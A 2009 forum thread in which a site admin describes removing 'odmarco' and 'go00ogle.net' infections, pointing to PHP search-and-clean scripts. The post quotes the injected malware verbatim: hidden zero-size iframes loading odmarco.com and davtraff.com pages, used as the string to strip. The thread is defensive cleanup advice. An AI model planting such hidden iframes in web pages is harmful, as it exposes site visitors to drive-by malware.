PDA

View Full Version : Removing Odmarco and go00ogle.net infections


rockinaway
08-29-2009, 10:00 PM
Recently, as many of you know, the forum was attacked and infected with malicious code and it took me approx. 5-6 hours to remove the infections properly. The forum was infected with 2 main things: 'odmarco' and 'go00ogle.net'. Both were causing major issues and blocked many users and made the forum VERY unsafe.

Odmarco was probably the most difficult to remove, as it added malicious code to nearly every HTML file that it could access. What was worse, was that it varied the code in several files.

In this article, I aim to show you two tips on removing these infections.

Odmarco Infection

Being the most difficult, it hit me very hard that I had to search ALL HTML files manually; therefore, I looked for scripts to help me. Thankfully, I found a handy website here: Left On The Web / Cleaning "infected" file from the odmarco string (http://www.leftontheweb.com/message/Cleaning_infected_file_from_the_odmarco_string)

There is a great deal of explanation on that page, and more importantly, a script to help remove the strings. All the script does is search for the odmarco string and remove it from the files. I have attached the file here as well (clear_odmarco.php)

Once you know what the main string is, copy and edit the following part in the file:

protected $string_to_clear = '<iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 ma
rginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://wjzmv6.davtraff.com/tomi/?t=2" width=0 height=0 style="hidden
" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://l0dari.davtraff.com/tomi/?t=2" width=0 heig
ht=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';Replace the iframe string with the code that is in your files.

This goes through all your files and folders to find any sign of the code. It all worked fine, until I realised that the code varies in some files. Therefore, you can manipulate the code slightly, to search for any remaining code. I have attached an edited version of the same file that can search for malicious strings (search_odmarco.php)

This file will search for the word 'odmarco' in any files, and then return 'FOUND' next to any files that contain it. You can then access these files to find the variations of the odmarco string. Then, you can either remove them manually, or change the $string_to_clear in clear_odmarco.php to help remove them for you.

Keep repeating this, until the search returns zero files to have found the word. You can repeat this for ANY other type of malicious code by simple changing the search term on line 38:

if (strpos($contents, 'odmarco')) Just replace odmarco with any other term. This should help you remove any traces of the infection and saves A LOT of time.

go00ogle.net Infection

This infection is much easier to remove. blog.ambor.com: How to remove a go00ogle.net infection from your WordPress blog (http://blog.ambor.com/2009/07/how-to-remove-go00oglenet-infection.html) contains a full list of steps to remove the malicious code and is considerably more straightforward.

For this infection, one (or several) of your javascript files gets infected with malicious code. You could choose to use the method for odmarco (with the files) to remove this or you can follow the steps given in the link. Since you shouldn't have that many JS files loading up, it shouldn't be too difficult for you to manually remove the code.

I hope this helps somewhat if you get infected - any questions, just ask :)

Originally posted @ AdminFuel (http://www.adminfuel.com)

-------

lazydesis
09-07-2009, 08:28 PM
How do you know if you got infected or not?

rockinaway
09-08-2009, 05:27 PM
When your page is loading, you will see the URLs loading, and there will be numerous URLs with 'odmarco' in them. Also, Google would end up blocking your website and you can use Webmaster Tools to find out what you are infected with.

go00ogle.net Infections are easier to find and are described in the link.

avsunforum
09-18-2009, 07:31 PM
Thanks

abdobasha2004
11-12-2009, 01:02 AM
thanks a lot for sharing this
I think I am not infected however it worth making sure of it
thanks